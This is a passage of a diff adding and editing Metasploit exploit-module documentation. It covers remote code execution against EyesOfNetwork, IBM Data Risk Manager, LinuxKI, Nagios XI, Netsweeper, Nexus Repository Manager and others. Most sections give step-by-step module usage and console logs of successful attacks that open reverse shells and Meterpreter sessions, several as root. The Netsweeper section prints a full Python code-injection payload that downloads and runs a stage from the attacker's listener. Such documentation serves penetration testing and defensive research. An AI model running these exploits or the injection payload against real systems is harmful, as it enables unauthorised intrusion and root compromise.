[*] Sending stage (3012516 bytes) to 192.168.1.3
|
||||
[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.3:38070) at 2020-05-19 08:49:46 -0400
|
||||
```
|
||||
|
||||
3. EyesOfNetwork version 5.3
|
||||
|
||||
```
|
||||
msf5 exploit(linux/http/eyesofnetwork_autodiscovery_rce) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.2:4444
|
||||
[*] Target is EyesOfNetwork version 5.3 or later. Attempting exploitation using CVE-2020-8657 or CVE-2020-8656.
|
||||
[*] Using generated API key: a926605f4e617fd68bbb86112156b41ea2406503859dad58b0d0aefcc848b755
|
||||
[+] Authenticated as user r6veXwtZ2zh
|
||||
[*] Command Stager progress - 100.00% done (897/897 bytes)
|
||||
[*] Sending stage (3012516 bytes) to 192.168.1.4
|
||||
[*] Meterpreter session 3 opened (192.168.1.2:4444 -> 192.168.1.4:60244) at 2020-05-19 08:50:04 -0400
|
||||
```
|
||||
|
||||
## References
|
||||
1. <https://www.exploit-db.com/exploits/48025>
|
||||
2. <https://nvd.nist.gov/vuln/detail/CVE-2020-8654>
|
||||
3. <https://nvd.nist.gov/vuln/detail/CVE-2020-8655>
|
||||
4. <https://nvd.nist.gov/vuln/detail/CVE-2020-8656>
|
||||
5. <https://nvd.nist.gov/vuln/detail/CVE-2020-8657>
|
||||
6. <https://nvd.nist.gov/vuln/detail/CVE-2020-9465>
|
||||
@@ -21,8 +21,6 @@ gcc ./cgitest.c -o cgi-bin/cgitest
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/goahead_ldpreload```
|
||||
|
||||
@@ -10,15 +10,13 @@ This module exploits an unauthenticated command execution vulnerability in Apach
|
||||
|
||||
https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn
|
||||
|
||||
## Vulnerable Application Installation Setup.
|
||||
### Vulnerable Application Installation Setup.
|
||||
|
||||
Change dictory to `vulhub/hadoop/unauthorized-yarn`, and run `docker-compose up -d`
|
||||
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/hadoop_unauth_exec```
|
||||
|
||||
@@ -0,0 +1,47 @@
|
||||
## Vulnerable Application
|
||||
|
||||
IBM Data Risk Manager (IDRM) contains three vulnerabilities that can be chained by an unauthenticated attacker to achieve remote code execution as root.
|
||||
The first is an unauthenticated bypass, followed by a command injection as the server user, and finally abuse of an insecure default password.
|
||||
This module exploits all three vulnerabilities, giving the attacker a root shell.
|
||||
At the time of disclosure, this is a 0day. Versions 2.0.3 and below are confirmed to be affected, and the latest 2.0.6 is most likely affected too.
|
||||
|
||||
|
||||
### Vulnerability information
|
||||
For more information about the vulnerability check the advisory at:
|
||||
https://github.com/pedrib/PoC/blob/master/advisories/IBM/ibm\_drm/ibm\_drm\_rce.md
|
||||
|
||||
### Setup
|
||||
|
||||
The application is available to download as a Linux virtual appliance from IBM's website. You need to have a valid IBM contract to be able to do so.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Module defaults work very well, you should just need to set `RHOSTS` and `LHOST`.
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
||||
## Scenarios
|
||||
|
||||
A successful exploit will look like this:
|
||||
|
||||
|
||||
```
|
||||
msf5 exploit(linux/http/ibm_drm_unauth_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on 10.9.8.1:4444
|
||||
[+] 10.9.8.213:8443 - Successfully "stickied" our session ID JQElTQxh
|
||||
[+] 10.9.8.213:8443 - We have obtained a new admin password 28010e88-6ffb-46e9-90d6-2ded732120d1
|
||||
[+] 10.9.8.213:8443 - ... and are authenticated as an admin!
|
||||
[*] 10.9.8.213:8443 - Detected IBM Data Risk Manager version 2.0.2 or above
|
||||
[+] 10.9.8.213:8443 - We have uploaded our payload...
|
||||
[+] 10.9.8.213:8443 - and our nmap script file!
|
||||
[+] 10.9.8.213:8443 - Bearer token 1b78100c-cf42-47fd-b64d-d36c07f1f934 obtained, wait for the final step where we invoke nmap...
|
||||
[+] 10.9.8.213:8443 - Shell incoming!
|
||||
[*] Command shell session 2 opened (10.9.8.1:4444 -> 10.9.8.213:57136) at 2020-04-21 15:46:29 +0700
|
||||
|
||||
whoami
|
||||
root
|
||||
uname -a
|
||||
Linux idrm-server.ibm.com 3.10.0-862.3.2.el7.x86_64 #1 SMP Tue May 15 18:22:15 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
|
||||
```
|
||||
@@ -0,0 +1,127 @@
|
||||
## Vulnerable Application
|
||||
LinuxKI Toolset <= 6.01
|
||||
|
||||
This module exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution.
|
||||
The `kivis.php` `pid` parameter received from the user is sent to the `shell_exec` function, resulting in security vulnerability.
|
||||
|
||||
To test this application, you need to download the version 6.01 [here](https://github.com/HewlettPackard/LinuxKI/blob/v6.0-1/Dockerfile).
|
||||
Do not forget to change [this URL](https://raw.githubusercontent.com/HewlettPackard/LinuxKI/master/rpms/linuxki-6.0-1.noarch.rpm) inside
|
||||
the Dockerfile with [this one](https://github.com/HewlettPackard/LinuxKI/raw/v6.0-1/rpms/linuxki-6.0-1.noarch.rpm).
|
||||
|
||||
## Verification Steps
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: ```use exploit/linux/http/linuxki_rce```
|
||||
4. Do: ```show TARGETS```
|
||||
5. Do: ```set TARGET #```
|
||||
6. Do: ```set RHOSTS```
|
||||
7. Do: ```set LHOST```
|
||||
8. Do: ```run```
|
||||
9. You should get a shell.
|
||||
|
||||
## Options
|
||||
### WritableDir
|
||||
|
||||
A writable directory file system path. (default: `/tmp`)
|
||||
|
||||
### ForceExploit
|
||||
|
||||
Override check result.
|
||||
|
||||
## Scenarios
|
||||
### LinuxKI Toolset v6.01 on CentOS 7.8
|
||||
```
|
||||
msf5 > use exploit/linux/http/linuxki_rce
|
||||
msf5 exploit(linux/http/linuxki_rce) > show targets
|
||||
|
||||
Exploit targets:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Automatic (PHP In-Memory)
|
||||
1 Automatic (PHP Dropper)
|
||||
2 Automatic (Unix In-Memory)
|
||||
3 Automatic (Linux Dropper)
|
||||
|
||||
|
||||
msf5 exploit(linux/http/linuxki_rce) > set rhosts 192.168.1.43
|
||||
rhosts => 192.168.1.43
|
||||
msf5 exploit(linux/http/linuxki_rce) > set rport 32769
|
||||
rport => 32769
|
||||
msf5 exploit(linux/http/linuxki_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.43:4444
|
||||
[*] Executing Automatic (PHP In-Memory) target
|
||||
[*] Sending payload...
|
||||
[*] Sending stage (38288 bytes) to 192.168.1.43
|
||||
[*] Meterpreter session 1 opened (192.168.1.43:4444 -> 192.168.1.43:53126) at 2020-06-07 20:27:10 +0300
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 36503ef4f463
|
||||
OS : Linux 36503ef4f463 4.19.76-linuxkit #1 SMP Fri Apr 3 15:53:26 UTC 2020 x86_64
|
||||
Meterpreter : php/linux
|
||||
meterpreter > exit
|
||||
[*] Shutting down Meterpreter...
|
||||
|
||||
[*] 192.168.1.43 - Meterpreter session 1 closed. Reason: User exit
|
||||
msf5 exploit(linux/http/linuxki_rce) > set target 1
|
||||
target => 1
|
||||
msf5 exploit(linux/http/linuxki_rce) > unset payload
|
||||
Unsetting payload...
|
||||
msf5 exploit(linux/http/linuxki_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.43:4444
|
||||
[*] Executing Automatic (PHP Dropper) target
|
||||
[*] Sending payload...
|
||||
[*] Sending stage (38288 bytes) to 192.168.1.43
|
||||
[*] Meterpreter session 2 opened (192.168.1.43:4444 -> 192.168.1.43:53133) at 2020-06-07 20:27:52 +0300
|
||||
[!] This exploit may require manual cleanup of '/tmp/kB4gJoH4xozwDdUva6tjqt.php' on the target
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 36503ef4f463
|
||||
OS : Linux 36503ef4f463 4.19.76-linuxkit #1 SMP Fri Apr 3 15:53:26 UTC 2020 x86_64
|
||||
Meterpreter : php/linux
|
||||
meterpreter > exit
|
||||
[*] Shutting down Meterpreter...
|
||||
|
||||
[*] 192.168.1.43 - Meterpreter session 2 closed. Reason: User exit
|
||||
msf5 exploit(linux/http/linuxki_rce) > set target 2
|
||||
target => 2
|
||||
msf5 exploit(linux/http/linuxki_rce) > set payload cmd/unix/reverse_bash
|
||||
payload => cmd/unix/reverse_bash
|
||||
msf5 exploit(linux/http/linuxki_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.43:4444
|
||||
[*] Executing Automatic (Unix In-Memory) target
|
||||
[*] Sending payload...
|
||||
[*] Command shell session 3 opened (192.168.1.43:4444 -> 192.168.1.43:53141) at 2020-06-07 20:29:56 +0300
|
||||
|
||||
uname -a
|
||||
Linux 36503ef4f463 4.19.76-linuxkit #1 SMP Fri Apr 3 15:53:26 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
|
||||
exit
|
||||
[*] 192.168.1.43 - Command shell session 3 closed.
|
||||
msf5 exploit(linux/http/linuxki_rce) > set target 3
|
||||
target => 3
|
||||
msf5 exploit(linux/http/linuxki_rce) > unset payload
|
||||
Unsetting payload...
|
||||
msf5 exploit(linux/http/linuxki_rce) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.43:4444
|
||||
[*] Executing Automatic (Linux Dropper) target
|
||||
[*] Sending payload...
|
||||
[*] Sending stage (980808 bytes) to 192.168.1.43
|
||||
[*] Meterpreter session 4 opened (192.168.1.43:4444 -> 192.168.1.43:53146) at 2020-06-07 20:31:23 +0300
|
||||
[!] This exploit may require manual cleanup of '/tmp/ag6G4ssIKEpH3lDyL.php' on the target
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : 172.17.0.2
|
||||
OS : CentOS 7.8.2003 (Linux 4.19.76-linuxkit)
|
||||
Architecture : x64
|
||||
BuildTuple : i486-linux-musl
|
||||
Meterpreter : x86/linux
|
||||
meterpreter > exit
|
||||
[*] Shutting down Meterpreter...
|
||||
|
||||
[*] 172.17.0.2 - Meterpreter session 4 closed. Reason: User exit
|
||||
msf5 exploit(linux/http/linuxki_rce) >
|
||||
```
|
||||
@@ -1,4 +1,5 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module exploits a SQL injection and command injection vulnerability in MicroFocus Secure Messaging
|
||||
Gateway. An unauthenticated user can execute a terminal command under the context of the web user.
|
||||
|
||||
@@ -11,7 +12,7 @@ endpoint without having a valid session.
|
||||
Combining these vulnerabilities gives the opportunity execute operation system commands under the
|
||||
context of the web user.
|
||||
|
||||
## Vulnerable Application Installation Steps
|
||||
### Installation Steps
|
||||
|
||||
Complete the following trial submission form. You will be able to [download the product as a OVA or ISO file](https://www.microfocus.com/products/secure-gateway/trial/).
|
||||
Installation instructions can be [found here](https://www.microfocus.com/documentation/secure-messaging-gateway/GWAVA%207.0/secure-gateway.pdf).
|
||||
@@ -111,4 +112,4 @@ msf5 exploit(linux/http/microfocus_secure_messaging_gateway) > run
|
||||
meterpreter > pwd
|
||||
/opt/gwava/gwavaman/http/admin/contents/ou
|
||||
meterpreter >
|
||||
```
|
||||
```
|
||||
|
||||
@@ -0,0 +1,96 @@
|
||||
## Introduction
|
||||
This module exploits a vulnerability in Nagios XI before 5.6.6 in order to execute arbitrary commands as root.
|
||||
|
||||
The module first checks if the supplied credentials are valid and belong to a user with permissions to modify plugins. It then exploits these permissions by uploading a malicious plugin to the target and subsequently sending an HTTP GET request to profile.php?cmd=download. This request downloads a system profile from the server and in the process launches the getprofile.sh script as root via a passwordless sudo entry. This script executes the malicious plugin as root.
|
||||
|
||||
For all supported targets except `Linux (cmd)`, the module uses a command stager to write the exploit to the target via the malicious plugin. However, this method may not work if Nagios XI is running in a restricted Unix environment like a minimal/custom CentOS installation. In the latter case, the target must be set to `Linux (cmd)`. For this target, the module writes the payload directly to the malicious plugin while avoiding commands that may not be supported in a restricted environment. It is recommended to use the target's default `cmd/unix/reverse_bash` payload in this scenario.
|
||||
|
||||
If the target is found to be vulnerable but the module completes without establishing a session, try increasing the value of `WfsDelay` (the additional delay when waiting for a session). The default value of this advanced option is 10 seconds. To check it, run `show advanced`. Other possible solutions are changing the payload, manually setting the value of the `CMDSTAGER::FLAVOR` advanced option, and setting the target to `Linux (cmd)` as explained above.
|
||||
|
||||
Valid credentials for a user with administrative privileges are required. This module was successfully tested on Nagios XI 5.6.5 running on CentOS 7. Please note that the module may behave differently when run against older versions of Nagios XI. For instance, during a test against Nagios XI 5.4.10, the module failed to trigger execution of the payload. Instead, the payload was executed randomly after a period of time (up to 5 minutes). Moreover, the session that was ultimately established, was not a root session.
|
||||
|
||||
## Vulnerable system
|
||||
Nagios XI before 5.6.6.
|
||||
|
||||
## Verification Steps
|
||||
1. Install the module as usual
|
||||
2. Start msfconsole
|
||||
3. Do: `use exploit/linux/http/nagiosxi_authenticated_rce`
|
||||
4. Do: `set RHOSTS [IP]`
|
||||
5. Do: `set SRVHOST [IP]`
|
||||
6. Do: `set USERNAME [username]`
|
||||
7. Do: `set PASSWORD [password]`
|
||||
8. Do: `set payload [payload]`
|
||||
9. Do: `set LHOST [IP]`
|
||||
10. Do: `set LPORT [port]`
|
||||
11. Do: `exploit`
|
||||
|
||||
## Options
|
||||
1. `USERNAME`. The username to authenticate with. This user should have permissions to modify plugins. The default setting is `nagiosadmin`, which is the default admin account for Nagios XI systems.
|
||||
2. `PASSWORD`. The password to authenticate with.
|
||||
|
||||
## Targets
|
||||
0. Linux (x86)
|
||||
1. Linux (x64) # This is the default target.
|
||||
2. Linux (cmd) # If wget is not installed on the target, this target should be selected together with the payload cmd/unix/reverse_bash.
|
||||
|
||||
## Scenarios
|
||||
```
|
||||
msf5 exploit(linux/http/nagiosxi_authenticated_rce) > show options
|
||||
|
||||
Module options (exploit/linux/http/nagiosxi_authenticated_rce):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
PASSWORD P@ssw0rd! yes Password to authenticate with
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS 192.168.1.1 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 80 yes The target port (TCP)
|
||||
SRVHOST 192.168.1.2 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
TARGETURI / yes Base path to NagiosXI
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME nagiosadmin yes Username to authenticate with
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter/reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST 192.168.1.2 yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
1 Linux (x64)
|
||||
|
||||
|
||||
msf5 exploit(linux/http/nagiosxi_authenticated_rce) > run
|
||||
[*] Started reverse TCP handler on 192.168.1.2:4444
|
||||
[*] Found Nagios XI application with version 5.6.5.
|
||||
[*] Using URL: http://192.168.1.2:8080/eFFP5lYvZ8eCnR0
|
||||
[*] Uploading malicious 'check_ping' plugin...
|
||||
[*] Command Stager progress - 100% done (121/121 bytes)
|
||||
[+] Successfully uploaded plugin.
|
||||
[*] Executing plugin...
|
||||
[*] Waiting for the plugin to request the final payload...
|
||||
[*] Client 192.168.1.1 (Wget/1.14 (linux-gnu)) requested /eFFP5lYvZ8eCnR0
|
||||
[*] Sending payload to 192.168.1.1 (Wget/1.14 (linux-gnu))
|
||||
[*] Sending stage (3021284 bytes) to 192.168.1.1
|
||||
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.1:56510) at 2020-02-27 16:27:49 +0100
|
||||
[*] Deleting malicious 'check_ping' plugin...
|
||||
[+] Plugin deleted.
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: uid=0, gid=0, euid=0, egid=0
|
||||
|
||||
```
|
||||
## References
|
||||
1. <https://github.com/jakgibb/nagiosxi-root-rce-exploit>
|
||||
2. <https://nvd.nist.gov/vuln/detail/CVE-2019-15949>
|
||||
@@ -0,0 +1,126 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module exploits a Python code injection in the Netsweeper
|
||||
WebAdmin component's `unixlogin.php` script, for versions 6.4.4 and
|
||||
prior, to execute code as the root user.
|
||||
|
||||
Authentication is bypassed by sending a random whitelisted `Referer`
|
||||
header in each request.
|
||||
|
||||
Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
|
||||
Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
|
||||
been confirmed exploitable.
|
||||
|
||||
### Setup
|
||||
|
||||
1. Download the [Netsweeper 6.4.3
|
||||
ISO](https://repo.netsweeper.com/netsweeper-el6-x86_64-6.4.3-1.iso)
|
||||
2. Boot from the ISO as a DVD in your preferred virtualization software
|
||||
3. Install the system as per the guided prompts
|
||||
|
||||
The system is based on CentOS Linux 6, and you may consult CentOS 6
|
||||
documentation for guidance on the installation process.
|
||||
|
||||
The default credentials for WebAdmin are `admin:netsweeper` if you need
|
||||
to log in to the web interface. This is not required for exploitation.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
||||
|
||||
## Targets
|
||||
|
||||
### 0
|
||||
|
||||
This executes a Python payload.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Netsweeper 6.4.3 ISO, based on CentOS Linux
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/netsweeper_webadmin_unixlogin
|
||||
msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > options
|
||||
|
||||
Module options (exploit/linux/http/netsweeper_webadmin_unixlogin):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 443 yes The target port (TCP)
|
||||
SSL true no Negotiate SSL/TLS for outgoing connections
|
||||
TARGETURI / yes Base path
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (python/meterpreter/reverse_https):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Python
|
||||
|
||||
|
||||
msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.157
|
||||
rhosts => 172.16.249.157
|
||||
msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set lhost 172.16.249.1
|
||||
lhost => 172.16.249.1
|
||||
msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > run
|
||||
|
||||
[*] Started HTTPS reverse handler on https://172.16.249.1:8443
|
||||
[*] Executing automatic check (disable AutoCheck to override)
|
||||
[+] The target appears to be vulnerable. Netsweeper 6.4.3 is a vulnerable version.
|
||||
[*] Selecting random whitelisted Referer header: webadmin/api/
|
||||
[*] Injecting Python code into password field: 0IonGkMXLHAz6WEurtI51ymUIkdaTIbP48wmlbCg7', 'd6'); exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMTYuMjQ5LjE6ODQ0My9YSDc1NmxXSnBQbjlUT2hZb19iT01BSldYQmRROScpLnJlYWQoKSkK')[0])) #
|
||||
[*] Sending python/meterpreter/reverse_https to https://172.16.249.157/webadmin/tools/unixlogin.php
|
||||
[*] https://172.16.249.1:8443 handling request from 172.16.249.157; (UUID: xvp5ei8z) Staging python payload (53935 bytes) ...
|
||||
[*] Meterpreter session 1 opened (172.16.249.1:8443 -> 172.16.249.157:54130) at 2020-05-12 00:26:22 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : localhost.localdomain
|
||||
OS : Linux 2.6.32-754.25.1.el6.x86_64 #1 SMP Mon Dec 23 15:19:53 UTC 2019
|
||||
Architecture : x64
|
||||
System Language : C
|
||||
Meterpreter : python/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Netsweeper 6.4.4 ISO, based on CentOS Linux
|
||||
|
||||
```
|
||||
msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > set rhosts 172.16.249.160
|
||||
rhosts => 172.16.249.160
|
||||
msf5 exploit(linux/http/netsweeper_webadmin_unixlogin) > run
|
||||
|
||||
[*] Started HTTPS reverse handler on https://172.16.249.1:8443
|
||||
[*] Executing automatic check (disable AutoCheck to override)
|
||||
[+] The target appears to be vulnerable. Netsweeper 6.4.4 is a vulnerable version.
|
||||
[*] Selecting random whitelisted Referer header: webadmin/systemconfig/edit_email_sending_settings.php
|
||||
[*] Injecting Python code into password field: 7Ot5EJTCtZeprAkH36J9t2Equy8', 'oL'); exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnSFRUUFNIYW5kbGVyJ10pCmhzPVtdCmlmICh2aVswXT09MiBhbmQgdmk+PSgyLDcsOSkpIG9yIHZpPj0oMyw0LDMpOgoJaW1wb3J0IHNzbAoJc2M9c3NsLlNTTENvbnRleHQoc3NsLlBST1RPQ09MX1NTTHYyMykKCXNjLmNoZWNrX2hvc3RuYW1lPUZhbHNlCglzYy52ZXJpZnlfbW9kZT1zc2wuQ0VSVF9OT05FCglocy5hcHBlbmQodWwuSFRUUFNIYW5kbGVyKDAsc2MpKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cHM6Ly8xNzIuMTYuMjQ5LjE6ODQ0My9KMFVhZjBVVzFic2lWemREZk8wUjdnVTZCUVBRYycpLnJlYWQoKSkK')[0])) #
|
||||
[*] Sending python/meterpreter/reverse_https to https://172.16.249.160/webadmin/tools/unixlogin.php
|
||||
[*] https://172.16.249.1:8443 handling request from 172.16.249.160; (UUID: bh9jykhb) Staging python payload (53873 bytes) ...
|
||||
[*] Meterpreter session 2 opened (172.16.249.1:8443 -> 172.16.249.160:49172) at 2020-05-12 00:27:22 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: root
|
||||
meterpreter > sysinfo
|
||||
Computer : localhost.localdomain
|
||||
OS : Linux 2.6.32-754.25.1.el6.x86_64 #1 SMP Mon Dec 23 15:19:53 UTC 2019
|
||||
Architecture : x64
|
||||
System Language : C
|
||||
Meterpreter : python/linux
|
||||
meterpreter >
|
||||
```
|
||||
@@ -0,0 +1,163 @@
|
||||
## Vulnerable Application
|
||||
|
||||
### Description
|
||||
|
||||
This module exploits a Java Expression Language (EL) injection in
|
||||
Nexus Repository Manager versions up to and including 3.21.1 to
|
||||
execute code as the Nexus user.
|
||||
|
||||
This is a post-authentication vulnerability, so credentials are
|
||||
required to exploit the bug. Any user regardless of privilege level
|
||||
may be used.
|
||||
|
||||
Tested against 3.21.1-01.
|
||||
|
||||
### Setup
|
||||
|
||||
Install Docker using the [official instructions](https://docs.docker.com/get-docker/).
|
||||
Follow the instructions for your platform and distribution (if using
|
||||
Linux). If you're using OS X, you may prefer to `brew cask install docker`
|
||||
after installing [Homebrew](https://brew.sh/).
|
||||
|
||||
#### Starting the application
|
||||
|
||||
Run `docker run -d -p 8081:8081 --name nexus sonatype/nexus3:3.21.1`
|
||||
(note the added `3.21.1` tag) as per Sonatype's [Docker Hub instructions](https://hub.docker.com/r/sonatype/nexus3/#running).
|
||||
|
||||
Open a browser and go to <http://localhost:8081/>. If you're greeted by
|
||||
the Nexus page, then the application has started successfully.
|
||||
|
||||
#### Changing the admin user's password
|
||||
|
||||
Run `docker exec nexus cat /nexus-data/admin.password` to get the admin
|
||||
password. Sign in as the `admin` user with the password you just
|
||||
retrieved.
|
||||
|
||||
Follow the prompts in the wizard. Change the password to something you
|
||||
can remember. You can click through the anonymous access question, since
|
||||
it's not relevant to the exploit. You don't need to enable the feature.
|
||||
|
||||
If you have trouble getting the password change to stick, wait a couple
|
||||
minutes or browse to <http://localhost:8081/#user/account> and change it
|
||||
again.
|
||||
|
||||
#### Adding an unprivileged user
|
||||
|
||||
1. Browse to <http://localhost:8081/#admin/security/users>
|
||||
2. Click `Create local user` on the current page
|
||||
3. Fill in all the required fields
|
||||
* You can set a fake e-mail address like `user@example.com`
|
||||
* Make sure you set a password you can remember, since you'll be using
|
||||
it to test the module
|
||||
* It is **critical** that you set the `Status` field to `Active` and
|
||||
move the `nx-anonymous` role to the `Granted` column
|
||||
4. Click `Create local user` on the current page
|
||||
5. Sign out the `admin` account and test your new login
|
||||
|
||||
After completing these steps, you may now test the module.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
Follow [Setup](#setup) and [Scenarios](#scenarios).
|
||||
|
||||
## Targets
|
||||
|
||||
### 0
|
||||
|
||||
This targets Nexus Repository Manager versions <= 3.21.1.
|
||||
|
||||
## Options
|
||||
|
||||
### USERNAME
|
||||
|
||||
Set this to a valid Nexus username. It can be an unprivileged user, but
|
||||
it defaults to `admin` because that is a known account.
|
||||
|
||||
### PASSWORD
|
||||
|
||||
Set this to a valid Nexus password. No default, since the `admin` user's
|
||||
password is randomized on install.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Nexus Repository Manager 3.21.1-01 from [Docker Hub](https://hub.docker.com/r/sonatype/nexus3)
|
||||
|
||||
```
|
||||
msf5 > use exploit/linux/http/nexus_repo_manager_el_injection
|
||||
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > options
|
||||
|
||||
Module options (exploit/linux/http/nexus_repo_manager_el_injection):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
PASSWORD yes Nexus password
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
|
||||
RPORT 8081 yes The target port (TCP)
|
||||
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
|
||||
SRVPORT 8080 yes The local port to listen on.
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
SSLCert no Path to a custom SSL certificate (default is randomly generated)
|
||||
TARGETURI / yes Base path
|
||||
URIPATH no The URI to use for this exploit (default is random)
|
||||
USERNAME admin yes Nexus username
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
Payload options (linux/x64/meterpreter_reverse_tcp):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
Exploit target:
|
||||
|
||||
Id Name
|
||||
-- ----
|
||||
0 Nexus Repository Manager <= 3.21.1
|
||||
|
||||
|
||||
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > set lhost 192.168.1.3
|
||||
lhost => 192.168.1.3
|
||||
msf5 exploit(linux/http/nexus_repo_manager_el_injection) > run
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.3:4444
|
||||
[*] Executing automatic check (disable AutoCheck to override)
|
||||
[+] The target appears to be vulnerable. Nexus 3.21.1-01 is a vulnerable version.
|
||||
